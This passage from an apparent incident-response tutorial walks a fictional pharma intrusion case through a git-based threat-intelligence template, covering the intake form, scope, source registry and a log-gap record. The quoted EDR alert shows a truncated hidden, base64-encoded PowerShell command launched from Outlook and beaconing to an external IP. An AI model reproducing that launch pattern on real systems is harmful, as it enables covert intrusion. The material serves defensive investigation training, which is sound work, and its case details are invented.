compressed.</p><p>On <strong>Friday, 15 November 2024 at 18:47 IST</strong>, the on-call SOC analyst receives a CrowdStrike behavioral detection:</p><pre>ALERT: Suspicious PowerShell Activity<br>Severity: High — Behavioral IOA<br>Host: WS-CFO-01.lifetechpharma.local  [Michal Cohen, CFO]<br>Process: powershell.exe (PID 3784)<br>Parent: OUTLOOK.EXE (PID 2240)<br>CommandLine: powershell.exe -NonI -W Hidden -Enc JABjAD0ATgBlAHcA...<br>Timestamp: 2024-11-15T18:42:33Z</pre><p>That’s the visible trigger. The actual breach started <strong>24 days earlier</strong> — and the alert is the second of two entry points, not the first.</p><h3>Step 00: Clone, Initialize, and Fill the Template</h3><p><strong>Before the phone rings.</strong> This step takes three minutes and is done once per investigation — ideally before the alert even comes in, or in the first five minutes after hanging up the initial call.</p><h4>1. Clone the repository (one-time setup)</h4><p>If you have not cloned CTI_as_a_Code yet, do this once on your analyst workstation:</p><pre>cd ~<br>git clone https://github.com/anpa1200/CTI_as_a_Code.git</pre><p>You will never modify this clone. It is your template source. Leave it as-is and pull updates periodically:</p><pre>cd ~/CTI_as_a_Code &amp;&amp; git pull</pre><h4>2. Create your investigations folder</h4><pre>mkdir -p ~/investigations</pre><p>Use any path you prefer — just keep it consistent across all cases. Do not create investigations inside the CTI_as_a_Code clone.</p><h4>3. Copy the reactive template for this case</h4><pre>cp -r ~/CTI_as_a_Code/templates/reactive/ ~/investigations/lifetech-2024-11</pre><p>Naming convention: [org-slug]-[YYYY-MM]. One folder per case. Verify the structure:</p><pre>ls ~/investigations/lifetech-2024-11/<br>tree ~/investigations/lifetech-2024-11/</pre><p>Expected:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/705/1*DR69iFmEn8s2K0zCrhXk5A.png"></figure><pre>00-scope/   01-evidence/   02-sources/   03-analysis/<br>04-detections/   05-deliverables/   06-ai-outputs/   07-feedback/<br>README.md   intake-form.md   project.yml</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zQn6v0h7KSMb9nw5gfYp8Q.png"></figure><h4>4. Initialize git inside the case folder</h4><pre>cd ~/investigations/lifetech-2024-11<br>git init<br>git add .<br>git commit -m "PROJ-2024-001: scaffold initialized from reactive template"</pre><p>This is commit zero. Its purpose is to prove — to a lawyer, an auditor, or yourself — exactly what state you started from before any analysis began.</p><h4>5. Fill in project.yml</h4><p>This file is the single source of truth for project metadata. Open it now:</p><pre>nano project.yml</pre><p>The template has blank fields. Fill every one(During the investigation):</p><pre>project:<br>  id: "PROJ-2024-001"<br>  name: "LifeTech Pharma — Targeted Intrusion"<br>  type: reactive<br>  classification: TLP:AMBER<br>  status: in-progress<br>analyst:<br>  name: "Your Name"<br>  role: "CTI Analyst"<br>  contact: "your@email.com"<br>timeline:<br>  incident_date: "2024-11-15"<br>  detection_date: "2024-11-15"<br>  investigation_start: "2024-11-15"<br>  report_due: "2024-11-17"         # INCD 72h clock - expires 18:47 IST Nov 17<br>pirs:<br>  - id: PIR-001<br>    question: "Was the US licensing formula package (SERVER-RD-02\\USPartner2024\\) accessed or exfiltrated? If so, what and when?"<br>    priority: high<br>    status: open<br>  - id: PIR-002<br>    question: "How did the adversary gain initial access - phishing, credential theft, or exploitation?"<br>    priority: high<br>    status: open<br>  - id: PIR-003<br>    question: "Is there evidence of ongoing access or persistence as of investigation date?"<br>    priority: high<br>    status: open<br>scope:<br>  systems:<br>    - WS-CFO-01<br>    - WS-IT-LEVI<br>    - SERVER-RD-02<br>    - SERVER-FIN-01<br>    - DC01<br>  threat_actor: unknown<br>  attck_techniques: []             # leave blank now - fill during R4<br>deliverables:<br>  - type: executive-brief<br>    status: pending<br>  - type: soc-handoff<br>    status: pending<br>  - type: sigma-rules<br>    count: 0<br>    status: pending<br>notes: "INCD 72h notification clock starts 2024-11-15 18:47 IST. Legal hold on WS-IT-LEVI - no hardware access, RTR only."</pre><p><strong>Do not leave any field as </strong><strong>"" or </strong><strong>[] if you know the value.</strong> Unknown fields are fine — write unknown explicitly. A blank field means "forgot to fill in." unknown means "we looked and do not know yet."</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*S90ed0BEsiZXgIu4G3ia5Q.png"></figure><h4>6. Commit the filled metadata</h4><pre>git add project.yml<br>git commit -m "PROJ-2024-001: project.yml filled — 3 PIRs, INCD deadline 2024-11-17 18:47 IST, legal hold WS-IT-LEVI"</pre><p>The folder is now named, scoped, and version-controlled. The intake call can begin.</p><h3>Step 0: Intake — What the First Call Captures</h3><p>Before opening Splunk, before pivoting on the C2 IP, before forming a hypothesis — the intake call runs. This is 15 minutes with the Tier 2 escalation and the IR Lead before any analysis work begins.</p><p>The intake captures facts that change what you look for.</p><p><strong>Open the intake form before dialing:</strong></p><pre>cp intake-form.md 00-scope/intake-2024-11-15.md<br>nano 00-scope/intake-2024-11-15.md</pre><p>The template has 9 sections. Work through them in order during the call — do not paraphrase in real time, write what the reporter says verbatim. You will analyze it after. For LifeTech this call produces:</p><pre># Investigation Intake — PROJ-2024-001 — 2024-11-15<br><br>Completed by: On-call CTI analyst (Yael Mizrahi)<br>Intake call with: Noa Ben-David (IR Lead), Ran Katz (SOC Manager)<br>Call time: 2024-11-15 18:55 IST<br><br>---<br><br>## 1. What was reported?<br><br>**1.1 What did you see or receive that caused you to raise this?**<br>"CrowdStrike fired a high-severity behavioral IOA on Michal Cohen's workstation —<br>PowerShell with base64 payload launched directly from Outlook. Tier 1 pulled the<br>network tab and found 3 outbound connections to 203.0.113.87 over the last 15<br>minutes. This is the CFO's machine. We escalated immediately."<br><br>**1.2 Where did this first come to your attention?**<br>- [x] Alert from SIEM / EDR / AV  ← CrowdStrike Falcon behavioral IOA, severity: High<br><br>**1.3 When did you first notice it?**<br>Date: 2024-11-15   Time: 18:47   Timezone: IST (UTC+2)<br><br>**1.4 Do you believe the activity is still ongoing?**<br>- [x] Yes — still active (C2 connections still firing at time of call)<br><br>---<br><br>## 2. What is already known?<br><br>**2.1 What systems, accounts, or services appear to be involved?**<br>- WS-CFO-01.lifetechpharma.local — Michal Cohen, CFO. Dell Latitude, Windows 11.<br>- 203.0.113.87 — external IP, destination of C2 connections. Not in any allowlist.<br>- OUTLOOK.EXE (PID 2240) → powershell.exe (PID 3784) — parent-child confirmed.<br>- No other hosts identified yet — investigation is 8 minutes old.<br><br>**2.2 What was the observed behavior?**<br>"PowerShell with -NonI -W Hidden -Enc flags spawned from Outlook. The encoded<br>command has not been decoded yet. Three separate TCP connections to 203.0.113.87<br>on port 443 over 15 minutes — looks like a beacon pattern."<br><br>**2.3 Has anyone else already investigated or looked into this?**<br>- [x] Yes — Tier 1 analyst (Omer Cohen) ran initial Splunk queries (last 1 hour only).<br>  What did they touch: read-only Splunk queries. No changes to the endpoint.<br><br>**2.4 What do you think happened?**<br>"Probably a phishing email with a malicious attachment — xlsm macro or something<br>similar. Michal must have opened it in the last few hours. We don't know if anyone<br>else was targeted."<br><br>---<br><br>## 3. Timeline of discovery<br><br>**3.1 When do you believe the activity started?**<br>- [ ] Known<br>- [x] Estimated: activity on WS-CFO-01 started approximately 18:42 IST (PowerShell<br>  launch timestamp from CrowdStrike event).<br><br>**3.2 How long do you estimate the activity has been occurring?**<br>Approximately 13 minutes from first PowerShell event to escalation call (18:42–18:55 IST).<br>However: unknown whether this is the beginning of the intrusion or a later stage.<br><br>**3.3 Is there a specific event that triggered the alert or complaint?**<br>CrowdStrike behavioral IOA fired at 18:42:33 IST on WS-CFO-01. Tier 1 escalated<br>at 18:47. IR Lead paged at 18:52. Intake call started at 18:55.<br><br>---<br><br>## 4. What has already been done?<br><br>**4.1 Has any system been rebooted, shut down, or reimaged since the activity was discovered?**<br>- [x] No — WS-CFO-01 is still running. Not yet isolated.<br><br>**4.2 Have any credentials, tokens, or API keys been rotated or revoked?**<br>- [x] No — no credential changes made yet.<br><br>**4.3 Has any network access been blocked or firewall rules been changed?**<br>- [x] No — 203.0.113.87 has not been blocked. Ran confirmed: "We wanted to check<br>  with you first before blocking — didn't want to tip them off."<br><br>**4.4 Has any malware been deleted or quarantined?**<br>- [x] No — CrowdStrike flagged the process but did not quarantine. Alert status: Detected,<br>  not Prevented (policy is set to Detect-only on this machine — CFO exception policy).<br><br>**4.5 Has anyone notified external parties?**<br>- [x] No — no external notification yet. INCD assessment pending scope confirmation.<br><br>---<br><br>## 5. Systems and access<br><br>**5.1 What logging is expected to exist for the affected systems?**<br>- Endpoint logs (Sysmon, CrowdStrike): [x] Yes — CrowdStrike on WS-CFO-01. Sysmon on<br>  WS-CFO-01. NOTE: Sysmon NOT deployed on server-class machines or DC01.<br>- VPN / authentication logs: [x] Yes — Cisco AnyConnect VPN, logs in Splunk.<br>- Database audit logs: [x] Yes — SQL audit on SERVER-RD-02 (partial EIDs only).<br>- Network flow / firewall logs: [x] Yes — Palo Alto NGFW. RETENTION: 14 days only.<br>  ⚠ SERVER-RD-02 outbound logs will expire 2024-11-29 for today's traffic.<br>- Email gateway logs: [x] Yes — M365 Message Trace, 30-day retention. ATP enabled.<br>  NOTE: ATP sandbox NOT enabled for xlsm files — policy gap identified.<br>- Cloud provider logs: [x] Yes — Azure AD sign-in logs, 30-day retention.<br><br>**5.2 What tools and access does the analyst have?**<br>- [x] Admin access to affected hosts (CrowdStrike RTR for WS-CFO-01, WS-CFO-01 CrowdStrike console)<br>- [x] Read access to SIEM (Splunk — full org)<br>- [x] Access to EDR console (CrowdStrike Falcon — full org view)<br>- [x] Access to network equipment / firewall logs (Palo Alto Panorama — read only)<br>- [x] Access to cloud console (Azure AD — Security Reader role)<br>- [x] Access to email gateway (M365 Security &amp; Compliance — Message Trace)<br>- [ ] VPN / jump host credentials — not yet, request submitted<br>- [x] TheHive / OpenCTI lab access<br><br>**5.3 Are there any systems the analyst should NOT touch?**<br>⚠ WS-IT-LEVI (Paz Levi, IT Admin): LEGAL HOLD issued at 20:45 IST today.<br>  HR investigation underway — UNRELATED to this incident (employment matter).<br>  Hardware access BLOCKED for 48–72 hours per Legal counsel (Adv. Dina Shapiro).<br>  Remote CrowdStrike RTR is PERMITTED — confirmed by Legal.<br>  No memory image, no disk image, no physical access until hold lifted.<br><br>---<br><br>## 6. Business impact<br><br>**6.1 What business processes are affected or at risk?**<br>"The CFO's email and workstation are involved. If this is a full compromise, finance<br>data is at risk. We also have R&amp;D server SERVER-RD-02 — it holds the formula files<br>for the US licensing deal. That deal closes in 6 weeks. If those files were touched,<br>we have an FDA NDA issue and a $52M deal at risk."<br><br>**6.2 Is customer data, employee data, or regulated data potentially involved?**<br>- [x] Yes — type: proprietary formula files under FDA NDA filing (USPartner2024 package,<br>  47 files, ~380 MB). Also: employee financial data on SERVER-FIN-01 if CFO path<br>  extended to finance server.<br><br>**6.3 What is the financial exposure if this is confirmed?**<br>Direct deal risk: $52M US licensing agreement. Regulatory exposure: Israeli Privacy<br>Protection Law (PPL) fines + FDA NDA breach penalties. Reputational exposure: US<br>partner disclosure obligation if formula data confirmed exfiltrated.<br><br>**6.4 Is there a hard deadline driving this investigation?**<br>- [x] Yes — deadline: INCD 72-hour notification window starts from discovery of<br>  breach (not discovery of alert). If formula data or critical infrastructure<br>  involvement confirmed: clock starts NOW → expires 2024-11-17 ~18:47 IST.<br><br>---<br><br>## 7. Regulatory and legal constraints<br><br>**7.1 Are there applicable notification requirements?**<br><br>| Regulation | Applicable? | Deadline | Notified? |<br>|---|---|---|---|<br>| INCD (Israeli critical infrastructure) | TBD — assess after scope confirmed | 72h from discovery | No |<br>| Biometric Database Authority | No — no biometric data at LifeTech | — | N/A |<br>| BoI-CD 362 (Israeli financial) | No — LifeTech is not a financial entity | — | N/A |<br>| GDPR | TBD — EU customers in export data? | 72h from awareness | No |<br>| PCI-DSS | No — no card processing at LifeTech | — | N/A |<br>| Israeli Privacy Protection Law | Yes — employee + partner data in scope | Per PPL — notify DPA if breach confirmed | No |<br>| FDA / NDA obligation | Yes — if formula files confirmed exfiltrated | Immediate notification to US partner | No |<br><br>**7.2 Is there an active legal hold on any systems or data?**<br>- [x] Yes — WS-IT-LEVI (Paz Levi). Legal hold issued 2024-11-15 20:45 IST.<br>  Contact: Adv. Dina Shapiro (Legal). Hold expected: 48–72 hours minimum.<br><br>**7.3 Has legal counsel been notified?**<br>- [x] Yes — Adv. Dina Shapiro notified of the security incident at 19:10 IST.<br>  Advised: do not touch WS-IT-LEVI hardware. RTR permitted with logging.<br><br>---<br><br>## 8. Analyst notes<br><br>(Raw notes taken during call — unprocessed)<br><br>- Ran (SOC): "The CFO is still at the office. We haven't told her yet. Should we?"<br>  → IR Lead decision: do not inform CFO until after memory dump. Risk: she might<br>  reboot the machine.<br>- The CrowdStrike policy on WS-CFO-01 is DETECT-ONLY (CFO exception policy).<br>  This is why the process was not killed automatically. SOC should evaluate<br>  moving to Prevent for exec machines after this incident.<br>- 203.0.113.87 — not blocklisted anywhere in org. Ran says: "It's clean on our<br>  end, never seen it before." Worth enriching immediately (VirusTotal, Shodan).<br>- Memory dump of WS-CFO-01 is urgent — C2 is still active. Process may have<br>  network artifact or decrypted payload in memory. Action: RTR memory dump NOW.<br>- No mention of SERVER-RD-02 during this call — IR Lead is not aware of the<br>  formula file risk yet. Will scope that separately after evidence inventory.<br>- p.levi (WS-IT-LEVI) is under HR investigation for unrelated reason. Legal hold<br>  is coincidental. However: IT admin access + legal hold + security incident<br>  creates a complex situation. Document carefully.<br><br>---<br><br>## 9. Next actions<br><br>| # | Action | Owner | Due |<br>|---|---|---|---|<br>| 1 | Take memory dump of WS-CFO-01 via CrowdStrike RTR before C2 session ends | Yael (CTI) | Immediate |<br>| 2 | Enrich 203.0.113.87 — VirusTotal, Shodan, passive DNS, ASN lookup | Yael (CTI) | Within 30 min |<br>| 3 | Pull M365 Message Trace for m.cohen last 48h — identify delivery vector | Omer (Tier 1) | Within 30 min |<br>| 4 | Retrieve Palo Alto firewall logs for WS-CFO-01 and SERVER-RD-02 — full available window | Ran (SOC) | Within 1h ⚠ retention risk |<br>| 5 | Check Azure AD sign-in logs for m.cohen and p.levi — last 30 days | Yael (CTI) | Within 1h |<br>| 6 | Confirm SERVER-RD-02 USPartner2024 directory access — pull EID 4663 from Splunk | Yael (CTI) | Within 2h |<br>| 7 | Open TheHive case PROJ-2024-001, attach this intake as first observable | Yael (CTI) | Within 30 min |<br>| 8 | Advise IR Lead on INCD 72h clock — confirm if formula data scope triggers mandatory notification | Noa (IR Lead) + Legal | Within 2h |<br><br>---<br><br>*Intake completed 2024-11-15 19:18 IST. File saved as 00-scope/intake-2024-11-15.md.*<br>*Case opened in TheHive: PROJ-2024-001.*<br>```<br><br>Two items in this intake change the entire investigation trajectory: the legal hold on `WS-IT-LEVI` (you cannot image it), and the potential for formula data in scope (Israeli PPL + FDA notification obligations). Both need to be on the table before analysis starts, not discovered mid-investigation.<br><br>The intake commits to git first:</pre><p>Two items in this intake change the entire investigation trajectory: the legal hold on WS-IT-LEVI (you cannot image it), and the potential for formula data in scope (Israeli PPL + FDA notification obligations). Both need to be on the table before analysis starts, not discovered mid-investigation.</p><p>The intake commits to git first:</p><pre>git add 00-scope/intake-2024-11-15.md<br>git commit -m "PROJ-001: intake — CFO PowerShell alert, legal hold on WS-IT-LEVI, formula data in scope"</pre><h3>Step 1–2: Project Setup and Scope</h3><p>The folder and git repo already exist from Step 00. This step fills the scope document and gets stakeholder sign-off before any analysis begins. The rule: <strong>you do not start looking at logs until the scope is committed.</strong></p><h4>1. Open the scope document</h4><pre>nano 00-scope/scope.md</pre><pre># Intelligence Source Registry<br><br>**Project:** PROJ-2024-001 — LifeTech Pharma Targeted Intrusion<br><br>Admiralty Scale: Source reliability A (completely reliable) – F (reliability cannot be judged).  <br>Information reliability: 1 (confirmed) – 6 (truth cannot be judged).<br><br>---<br><br>## Internal Sources<br><br>| ID | Source | Type | Admiralty | Notes |<br>|---|---|---|---|---|<br>| INT-001 | Splunk SIEM | Log aggregation | A/2 | Primary forensic source; full org scope; read-only access. Initial 1h Splunk query by Tier 1 (Omer Cohen) — covered WS-CFO-01 only. |<br>| INT-002 | CrowdStrike Falcon | EDR / endpoint telemetry | A/2 | Deployed on WS-CFO-01, WS-IT-LEVI. NOT deployed on R&amp;D server fleet (12 servers) or DC01. CFO machine on Detect-only policy (not Prevent). |<br>| INT-003 | Palo Alto NGFW (Panorama) | Firewall flows / NetFlow | A/2 | Read-only. 14-day retention. ⚠ SERVER-RD-02 Nov 6 outbound flows expire 2024-11-20 — retrieve before any other task. |<br>| INT-004 | M365 Message Trace | Email gateway logs | A/2 | 30-day retention. ATP sandbox NOT enabled for .xlsm files — phishing attachment delivered uninspected. |<br>| INT-005 | Azure AD sign-in logs | Cloud authentication | A/2 | 30-day retention. Security Reader role. Covers m.cohen and p.levi sign-in history. |<br>| INT-006 | Sysmon (WS-CFO-01, WS-IT-LEVI) | Endpoint process/network telemetry | A/2 | NOT deployed on server-class machines (SERVER-RD-02, SERVER-FIN-01, DC01). |<br>| INT-007 | Windows Security event logs (DC01, SERVER-RD-02) | Authentication / authorization | A/2 | DC01: partial export only — full log inaccessible. EID 4662 (DCSync) and EID 4663 (object access) relevant. |<br>| INT-008 | SQL audit — SERVER-RD-02 | Database object-access audit | A/2 | Partial EIDs only; not all object-access events captured. Required for PIR-001 (formula file access). |<br>| INT-009 | Cisco AnyConnect VPN | VPN session logs | A/2 | Available in Splunk. Covers p.levi sessions (AiTM hypothesis). |<br><br>---<br><br>## External / OSINT Sources<br><br>| ID | Source | Type | Admiralty | TLP | Notes |<br>|---|---|---|---|---|---|<br>| EXT-001 | CERT-IL | Government advisory | A/2 | TLP:AMBER | Check for active advisories targeting Israeli pharma sector. |<br>| EXT-002 | VirusTotal | IOC enrichment | C/3 | TLP:WHITE | Immediate priority: 203.0.113.87 hash/IP lookup. Crowdsourced — treat as corroborating only. |<br>| EXT-003 | Shodan | Infrastructure recon | C/3 | TLP:WHITE | 203.0.113.87 ASN / infrastructure / open-port lookup. |<br>| EXT-004 | URLScan.io | Domain analysis | C/3 | TLP:WHITE | Passive DNS and domain history for C2 domains identified in flows. |<br>| EXT-005 | MISP | Community threat intel | B/3 | TLP:AMBER | Pharma sector sharing. Cross-reference IOCs against community feed. |<br><br>---<br><br>## Source Limitations<br><br>| Source | Known Limitation |<br>|---|---|<br>| Palo Alto NGFW (INT-003) | 14-day retention only. SERVER-RD-02 Nov 6 outbound flows expire **2024-11-20** — retrieve immediately, before any other analysis. |<br>| CrowdStrike Falcon (INT-002) | Not deployed on R&amp;D server fleet (12 servers) or DC01. No EDR telemetry for those hosts — Windows Security events and NGFW logs are the only visibility. |<br>| Sysmon (INT-006) | Not deployed on server-class machines (SERVER-RD-02, SERVER-FIN-01, DC01). Process creation and network telemetry unavailable for those hosts. |<br>| Windows Security / DC01 (INT-007) | Only partial event log export available; full log is inaccessible. Analytical confidence on DC01 activity is reduced. |<br>| M365 ATP (INT-004) | Sandbox not enabled for .xlsm attachments. The suspected phishing attachment was delivered without detonation — no ATP verdict available. |<br>| SQL audit — SERVER-RD-02 (INT-008) | Partial EIDs only. Not all object-access events are captured. Absence of a log entry does NOT confirm file was not accessed. |<br>| WS-IT-LEVI — all sources | Legal hold issued 2024-11-15 20:45 IST (Adv. Dina Shapiro). No hardware, disk, or memory image permitted. CrowdStrike RTR allowed with full session logging. Re-assess after hold lifted (est. 48–72h). |<br>| Azure AD sign-in logs (INT-005) | 30-day retention. Historical data before approximately 2024-10-15 is unavailable. |<br>| M365 Message Trace (INT-004) | 30-day retention. Historical data before approximately 2024-10-15 is unavailable. |<br>| VirusTotal (EXT-002) | Crowdsourced; vendor detections may be absent for fresh infrastructure. A clean VT result does not rule out malicious use. Treat as corroborating, not authoritative. |</pre><p>The template has six sections. Fill each one now:</p><p><strong>Header — fill the four metadata lines at the top:</strong></p><pre>Project: PROJ-2024-001<br>Classification: TLP:AMBER<br>Date scoped: 2024-11-15<br>Scoped by: [your name]<br>Approved by: Noa Ben-David, IR Lead</pre><p><strong>Incident Summary — one paragraph, what triggered this:</strong></p><pre>CrowdStrike behavioral detection on WS-CFO-01 at 18:42 IST, November 15, 2024.<br>PowerShell spawned by OUTLOOK.EXE with base64-encoded payload, downloading from<br>203.0.113.87. Scope of compromise unknown. Formula files on SERVER-RD-02 are<br>potentially in scope — US licensing deal ($52M) requires regulatory assessment.</pre><p><strong>In Scope — fill the asset table:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DCTpI5jIcRRkQ2YqjL8LgQ.png"></figure><p><strong>Out of Scope — fill the exclusion table:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*X9YT7xlqBXmn_mRAm67QwA.png"></figure><p><strong>PIRs — copy from project.yml, add due dates:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Fz8_y2Mq8glncIY5VHdEMA.png"></figure><p><strong>Constraints and Assumptions — fill the four fields:</strong></p><pre>Legal/regulatory: INCD 72h notification window expires 2024-11-17 18:47 IST.<br>  Israeli Privacy Protection Law + FDA NDA obligations if formula data confirmed.<br>Evidence limitations: Palo Alto firewall logs — 14-day retention.<br>  SERVER-RD-02 Nov 6 outbound logs expire 2024-11-20. Retrieve immediately.<br>  Sysmon absent from all server-class machines.<br>Access restrictions: WS-IT-LEVI — legal hold, no hardware access. RTR permitted.<br>Assumptions: All timestamps assumed UTC unless marked IST. Not converted in log excerpts.</pre><p><strong>Definition of Done — check the boxes your team has agreed to:</strong></p><pre>- [ ] All PIRs answered or formally deferred with reasoning<br>- [ ] Timeline covers full attacker dwell period (or gap documented)<br>- [ ] ATT&amp;CK mapping reviewed and finalized<br>- [ ] At least one detection rule per confirmed TTP<br>- [ ] SOC handoff delivered and acknowledged<br>- [ ] Executive brief approved by Noa Ben-David (IR Lead)<br>- [ ] INCD notification filed if formula data confirmed</pre><p>Full scope.md:</p><pre># Scope Definition<br><br>**Project:** PROJ-2024-001<br>**Classification:** TLP:AMBER<br>**Date scoped:** 2024-11-15<br>**Scoped by:** Yael Mizrahi (CTI Analyst)<br>**Approved by:** Noa Ben-David (IR Lead) — verbal approval 19:22 IST<br><br>---<br><br>## Incident Summary<br><br>CrowdStrike behavioral IOA fired on WS-CFO-01 (Michal Cohen, CFO) at 18:42 IST on<br>2024-11-15. PowerShell with encoded payload launched from OUTLOOK.EXE; three outbound<br>C2 connections to 203.0.113.87 confirmed within 15 minutes of detection. Scope of<br>compromise is unknown at time of scoping — the CFO alert may be a late-stage indicator<br>of a broader intrusion. Formula files on SERVER-RD-02 (US licensing package, ~380 MB,<br>47 files) are in scope for PIR-001 due to financial and regulatory exposure ($52M deal,<br>FDA NDA obligations). INCD 72h notification clock assessed as active from time of<br>discovery.<br><br>---<br><br>## In Scope<br><br>| Asset / System | Owner | Justification |<br>|---|---|---|<br>| WS-CFO-01.lifetechpharma.local | IT Dept / Michal Cohen (CFO) | Triggering alert host — CrowdStrike IOA, active C2 |<br>| WS-IT-LEVI.lifetechpharma.local | IT Dept / Paz Levi (IT Admin) | Suspected initial access vector — AiTM phishing hypothesis |<br>| SERVER-RD-02.lifetechpharma.local | R&amp;D Dept | Formula file storage — PIR-001 primary asset |<br>| SERVER-FIN-01.lifetechpharma.local | Finance Dept | Lateral movement target — confirmed by CrowdStrike alert Nov 15 |<br>| DC01.lifetechpharma.local | IT Dept | DCSync event EID 4662 observed from non-DC IP |<br>| Exchange Online (M365) | IT / Microsoft | Email delivery vector — phishing investigation |<br>| Azure AD | IT / Microsoft | Authentication logs — VPN session token replay |<br>| Palo Alto NGFW (perimeter) | IT / Network team | C2 traffic confirmation, SERVER-RD-02 exfil flows |<br><br>---<br><br>## Out of Scope<br><br>| Asset / System | Reason for Exclusion |<br>|---|---|<br>| SharePoint Online / OneDrive | Cloud scope — no evidence of involvement; requires separate authorization |<br>| Manufacturing SCADA / OT network | No evidence of lateral movement into OT segment at this time |<br>| WS-IT-LEVI — hardware / disk image | Legal hold issued 2024-11-15 20:45 IST. No hardware access until hold lifted. RTR permitted. |<br>| All other endpoints (838 total) | Out of scope pending hunt results — may expand if pivot on C2 domains finds new hosts |<br><br>---<br><br>## Priority Intelligence Requirements (PIRs)<br><br>| ID | Question | Priority | Due | Status |<br>|---|---|---|---|---|<br>| PIR-001 | Was the US licensing formula package (`SERVER-RD-02\LicenseDeals\USPartner2024\`) accessed or exfiltrated? If so, what and when? | High | 2024-11-16 06:00 IST | Open |<br>| PIR-002 | How did the adversary gain initial access — phishing, credential theft, exploitation, or insider? | High | 2024-11-16 06:00 IST | Open |<br>| PIR-003 | Is there evidence of ongoing access or persistence as of 2024-11-15 19:00 IST? Are any other hosts compromised? | High | 2024-11-16 06:00 IST | Open |<br><br>---<br><br>## Constraints and Assumptions<br><br>- **Legal/regulatory:** INCD 72h notification window — expires approximately 2024-11-17<br>  18:47 IST. Israeli Privacy Protection Law (PPL) notification to DPA if personal data<br>  breach confirmed. FDA NDA obligation to notify US partner if formula files confirmed<br>  exfiltrated — no specific deadline but immediate notification is standard practice.<br>- **Evidence limitations:**<br>  - Palo Alto NGFW firewall flows: 14-day retention only. SERVER-RD-02 November 6<br>    outbound traffic expires 2024-11-20. **Retrieve before any other analysis.**<br>  - Sysmon NOT deployed on server-class machines (SERVER-RD-02, SERVER-FIN-01, DC01).<br>  - CrowdStrike NOT deployed on R&amp;D server fleet (12 servers) or DC01.<br>  - DC01 Windows Security log: only partial export available — full log inaccessible.<br>  - ATP sandbox not enabled for .xlsm files — attachment was delivered uninspected.<br>- **Access restrictions:**<br>  - WS-IT-LEVI: legal hold, no hardware/disk/memory access. CrowdStrike RTR permitted<br>    with full session logging. Contact Adv. Dina Shapiro before any exception.<br>  - VPN jump host credentials: requested, not yet provisioned (Yael Mizrahi, 19:05 IST).<br>- **Assumptions:**<br>  - All log timestamps assumed UTC unless explicitly marked IST in source.<br>  - CrowdStrike behavioral detections treated as CONFIRMED source (Admiralty A/2).<br>  - Sysmon EID events treated as CONFIRMED source where forwarder health is verified.<br><br>---<br><br>## Stakeholders<br><br>| Name | Role | Involvement |<br>|---|---|---|<br>| Noa Ben-David | IR Lead | Scope approval; receives executive brief; INCD notification decision |<br>| Ran Katz | SOC Manager | SOC handoff; implements detection rules; hunting queries |<br>| Adv. Dina Shapiro | Legal Counsel | Legal hold oversight; PPL / regulatory notifications; WS-IT-LEVI access decisions |<br>| [CISO name] | CISO | Executive brief recipient; $52M deal brief to Board |<br>| [US Partner contact] | External — US biopharma | FDA NDA notification if PIR-001 answered YES |<br><br>---<br><br>## Definition of Done<br><br>This investigation is complete when:<br><br>- [ ] All three PIRs answered or formally deferred with documented reasoning<br>- [ ] Timeline covers full attacker dwell period from first access to detection (or gap documented)<br>- [ ] ATT&amp;CK mapping completed and reviewed — all confirmed techniques have a gap type<br>- [ ] At least one Sigma detection rule per confirmed TTP with Rule Missing or Coverage Incomplete gap<br>- [ ] SOC handoff document delivered to Ran Katz and acknowledged<br>- [ ] Executive brief approved by Noa Ben-David (IR Lead)<br>- [ ] INCD notification filed if formula data or CII involvement confirmed (deadline: 2024-11-17 18:47 IST)<br>- [ ] PPL / FDA NDA notification decision documented (even if decision is: not required)<br>- [ ] project.yml status set to `closed` and all PIR statuses updated</pre><h4>2. Save the file and commit</h4><pre>git add 00-scope/scope.md<br>git commit -m "PROJ-2024-001: scope signed off — 5 systems, 3 PIRs, INCD deadline 2024-11-17, firewall log retrieval urgent"</pre><p><strong>The firewall log retention deadline drives everything.</strong> SERVER-RD-02’s November 6 outbound traffic expires November 20. That is the exfiltration confirmation window. If it closes, CL-003 becomes INFERRED, not CONFIRMED. Retrieve those logs before any other analysis.</p><h3>Step R1: Evidence Inventory — What Exists and What Is Missing</h3><p>The evidence inventory runs before analysis. The rule: <strong>you do not analyze what you have not inventoried.</strong></p><h4>1. Open the source registry</h4><pre>nano 02-sources/source-registry.md</pre><p>The template has two tables: Internal Sources and External Sources. Fill every row you have access to — and explicitly mark what is absent. Unknown coverage is not the same as no coverage.</p><h4>2. Fill in what you have</h4><p>For each log source, fill four fields: <strong>Source name</strong>, <strong>System(s) it covers</strong>, <strong>Admiralty reliability rating</strong>, and <strong>any known gap</strong>. Where a source is absent from a system that should have it, add a row with — absent in the Gap column. That absence is a finding.</p><p>For LifeTech, the completed source registry drives this inventory:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Mt6DCDNVu6YThxF6WCowcg.png"></figure><p><strong>GAP-001 — WS-IT-LEVI Sysmon: October 22 — November 1, 2024</strong></p><pre>Duration: 10 days<br>Root cause: Unknown — Sysmon forwarder stopped. Coincides exactly with<br>  the day the IT admin received a phishing email.<br>What is missing: process creation (EID 1), network connections (EID 3),<br>  file creation (EID 11) for this host during this entire window.<br>Impact: Cannot confirm or rule out attacker activity on WS-IT-LEVI<br>  between Oct 22 and Nov 1. All claims about this period are INFERRED<br>  or HYPOTHESIZED unless supported by alternative sources (VPN logs,<br>  DC authentication logs, firewall flows).<br>Possible cause: Deliberate anti-forensic technique — terminating Sysmon<br>  service is a known evasion method.</pre><p>The 10-day gap on the IT admin workstation starts the same day a phishing email was delivered to him. This is not coincidence — it is a finding.</p><h4>3. Create a GAP document for every gap</h4><p>Each gap gets its own file. Create it now:</p><pre>nano 01-evidence/GAP-001-ws-it-levi-sysmon.md</pre><p>Paste the filled template:</p><pre># GAP-001 — WS-IT-LEVI Sysmon | 2024-10-22 – 2024-11-01<br>Duration: 10 days (2024-10-22 11:31 UTC to 2024-11-01 09:14 UTC)<br>Root cause: Sysmon forwarder stopped. Coincides exactly with delivery<br>  of phishing email to p.levi at 11:23 UTC.<br>What is missing: EID 1 (process creation), EID 3 (network connections),<br>  EID 11 (file creation) for WS-IT-LEVI during this entire 